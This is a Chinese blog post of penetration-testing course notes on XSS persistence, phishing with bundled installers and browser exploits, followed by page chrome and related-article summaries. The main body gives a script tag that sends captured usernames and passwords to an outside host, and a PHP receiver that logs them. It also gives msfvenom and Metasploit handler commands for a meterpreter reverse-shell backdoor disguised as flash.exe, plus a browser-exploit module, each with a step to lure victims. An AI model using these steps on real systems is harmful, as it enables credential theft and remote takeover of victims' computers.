day37 XSS跨站&权限维持&钓鱼捆绑&浏览器漏洞

最新推荐文章于 2024-03-10 19:40:57 发布
最新推荐文章于 2024-03-10 19:40:57 发布
阅读量738 收藏
点赞数
分类专栏: 小迪网安笔记 文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hesysd/article/details/127986176
版权

#XSS-后台植入Cookie&表单劫持

-条件:已取得相关web权限后

1、写入代码到登录成功文件,利用beef或xss平台实时监控Cookie等凭据实现权限维持

2、若存在同源策略或防护情况下,Cookie获取失败可采用表单劫持或数据明文传输实现


将账户密码发到某个地方

$变量=<script src="http://www.xiaodi8.com/get.php?user=账户&pass=密码"></script>

echo $变量//因为是php,没办法直接执行js,所以需要这样操作。

<?php

$a=$_GET['user'];

$b=$_GET['pass']

$myfile=fopen("newfile.txt","w");//创建一个txt,

fwrite($myfile,$A);写入数据

fwrite($myfile,"I")

fwrite($myfile,$b)

fclose($myfile)

?>

#XSS-Flash钓鱼配合MSF捆绑上线

-条件:beef上线受控后或直接钓鱼(受害者爱看SESE)

1、生成后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=6666 -f exe > flash.exe

2、下载官方文件-保证安装正常

3、压缩捆绑文件-解压提取运行

4、MSF配置监听状态

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 6666

run

5、诱使受害者访问URL-语言要适当

#XSS-浏览器网马配合MSF访问上线

-条件:beef上线受控后或直接钓鱼(浏览器存在0day)

1、配置MSF生成URL

use exploit/windows/browser/ms14_064_ole_code_execution

set allowpowershellprompt true

set target 1

run

2、诱使受害者访问URL-语言要适当

匿名用户0x3c
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CobalStrike批量上线后的权限维持和信息收集~
Ms08067安全实验室
01-11 846
出品|MS08067实验室本文作者:BlackCat(Ms08067内网安全小组成员)BlackCat微信(欢迎骚扰交流):前言:昨天做CS批量上线的时候发现,内网渗透的本质都是信息收集...
xss权限维持(小技巧)
weixin_44110913的博客
08-04 835
xss权限维持 打开xss平台 创建打cookie的payload,默认的即可 复制xss代码 打开中国蚁剑连接webshell 将xss复制到登陆后的页面保存 为什么要复制到登陆后?因为受害者登陆后会产生cookie,从而每一次xss平台都能收到cookies 现在假设管理人员登陆到后台 当跳转到登陆后的页面index.php后 我们的xss便起效了,并且收到了cookie 此后,只要他每次登陆我们都可看到cookie,也就是每次都具有权限登陆。 这种攻击类型杀毒是不会爆的,只有
XSS深入利用-权限维持
xiaoheizi的博客
06-29 295
在安全测试中能拿下数据库权限不代表就能拿下web权限,还有如果你留下的网后门被杀死,就可以利用这些方法继续获取web权限。表单劫持即可以解决cookie无效的情况,也可以解决获取到账号密码但是解密不成功的情况。利用:写入代码到登录成功文件,利用beef或xss平台实时监控Cookie等凭据实现。发现是login_check.php接收的,打开文件查看接收账号密码的参数。根据代码可以看到在管理员输入的账号密码被加密之前就被我们获取了。在我们的服务器上创建接收账号密码的代码文件并写入保存。
WEB攻防-通用漏洞&XSS-表单劫持&钓鱼捆绑
m0_65336233的博客
10-13 1132
WEB攻防-通用漏洞&XSS-表单劫持&钓鱼捆绑
XSS 绕过实例, 钓鱼,会话劫持
buffedon的博客
05-26 821
XSS原理--防御--绕过实例原理危害防护绕过实例场景一:事件+单引号闭合场景二:大小写绕过场景三:双写绕过场景四:JavaScript伪协议+编码场景五:事件+%0a当做空格场景六:http头部参数插入payload场景七:文件解析 原理 危害 防护 绕过实例 场景一:事件+单引号闭合 ‘οnmοuseοver=alert(1)’ 查看源代码后发现,value是要用单引号进行闭合 场景二:大小写绕过 "&gt;&lt;scRIp&gt;alert(1)&lt;/script&gt;&lt;" 发现
XSS &amp; SQL注入
10-30
XSS(Cross-Site Scripting,脚本)和 SQL 注入是两种常见的 Web 安全漏洞。下面将详细介绍 XSS 和 SQL 注入的概念、原理和应用。 什么是 XSSXSS,或者称为 CSS,代表着脚本。基本上,XSS 意味着你可以...
修复swfupload2.5版存在的XSS攻击漏洞
10-08
修复swfupload2.5版存在的XSS攻击漏洞,测试无错误版本。
xss脚本攻击-运维安全详细笔记
06-30
xss脚本攻击是一种常见的Web应用安全漏洞,攻击者可以通过在网上注入恶意代码,盗取用户敏感信息,控制企业数据,非法转账,发送恶意邮件等。下面是xss脚本攻击的知识点总结: 1.xss脚本攻击的定义 ...
XSS脚本攻击剖析与防御.pdf
05-16
XSS脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
ThinkPHP2.x防范XSS攻击的方法
12-19
本文实例讲述了ThinkPHP2.x防范XSS攻击的方法。分享给大家供大家参考。具体如下: 一直使用ThinkPHP2.x,通过乌云有向提交了ThinkPHP XSS攻击的bug,抽时间看了一下。 原理是通过URL传入script标签,ThinkPHP...
xss——权限维持钓鱼
最新发布
2303_79592445的博客
03-10 306
我们可以通过这个找到,密码发送的地方,然后就可以去找那个文件,就可以知道它密码验证的逻辑,就可以通过验证代码入手。这是我们自己写的代码,当管理员输入密码的时候,就会将它的密码发给我这个网,我们就可以通过这个网来接受。把后门植入后,当重新登录后台,就会触发这个代码,将数据发送给xss平台。生成后门,但是还得免杀,因为如果对方有杀毒软件,就没得玩了。当我点击下载就会触发地址,然后让服务武器处于监听状态。onclict点击就会触发a,然后就会诱惑它点击网。然后他就会下载这个后门了,我们就可以操作了。
python带你采集无水印美女舞蹈shipin数据~
m0_72282564的博客
09-16 1504
嗨喽,大家好呀~这里是爱看美女的茜茜呐又到了学Python时刻~python 3.8 解释器pycharm 编辑器ffmpeg 音视频合成软件软件点击蓝色字体自取。
脚本(XSS漏洞
梁辰兴的博客
06-07 4865
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。甚至可以结合浏览器自身漏洞对用户主机进行远程控制等。形
我是色色 -- 个人开通 (*^__^*) 嘻嘻……
热门推荐
过客阵营 -- 简单的就要最简单
09-23 18万+
iamsese.goofar.com 我的个人 不过 goofar.com 这个太抠了 速度慢的像蜗牛 改成iamsese.beijingextreme.com 看看 俺新加的纯HTML的进度条特效 (*^__^*) 嘻嘻……
网安之web攻防第三十七天
B_l_a_nk的博客
04-06 155
1、XSS-另类攻击手法分类 2、XSS-权限维持&钓鱼&浏览器
【小迪安全】红蓝对抗 | 网络攻防 | V2022全栈培训笔记(WEB攻防35-40-XSS、CSRF、SSRF)
qq_46343633的博客
12-22 1081
1、XSS-原理&攻击&分类等2、XSS-反射型&存储型&DOM型等3、XSS攻击手法&劫持&恣取凭据等4、XSS-攻击项目&XSS平台&Beef-XSS1、原理指改击者利用网程序对用户输入过不足,端入可以量示在页面上对其他用尸道成影响的HTML代码,从而盗取用户资料、利用用户具份进行某种动或者对访问者进行病毒侵害的一种攻击方式,通过在用户端注入恶意的可执行脚本,若服务器时用户的第人不进行处理或处理不严,则浏览器就会夏接执行用户注入的脚本。反馈与浏览。
后渗透阶段的权限维持
Fly_鹏程万里
08-22 2592
前言 当我们在渗透过程中通过漏洞获取到目标主机权限后,往往会因为服务器管理员发现和修补漏洞而导致对服务器权限的丢失,所以权限维持就显得很重要了。 在windows主机中,我总结了下面几种权限维持的方法,不足之处还望各位大佬斧正。 添加影子账户 影子账户可以理解为和主体一模一样但是又看不见的账户,其隐蔽性较好,只能在注册表里面看到。 首先,我们需要创建一个隐藏账号OMG$ 使用命令 net...
渗透中的权限维持
anquanzushiye的博客
04-13 2756
当今时代,每时每刻都发生着新的重大数据泄露事件,对于个人Internet用户、公司和政府而言,重要的是要时刻意识到可能影响其系统的漏洞。SECSHI.COM提供了全方位的信息和工具,以...
后渗透权限维持的方法
https://www.cnblogs.com/zpchcbd/
08-11 4334
一、影子账户 net user admin$ admin /add 具体可以通过注册表查找 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\Users\Names,在默认情况下,隐藏用户的查看是隐藏的。 解决方法:在SAM文件夹处点击右键—&gt;权限(设置就好了) 二、shift后门 1、先删除缓存C:\WINDOWS\system32\dllcache...
xss脚本漏洞修复
08-31
XSS脚本漏洞修复是保护网免受潜在攻击的重要措施。下面是一些常见的修复方法: 1. 输入验证:对于用户输入的数据,进行严格的验证和过滤。使用白名单机制,只允许特定的字符和标签,过滤掉所有潜在的恶意脚本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

匿名用户0x3c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值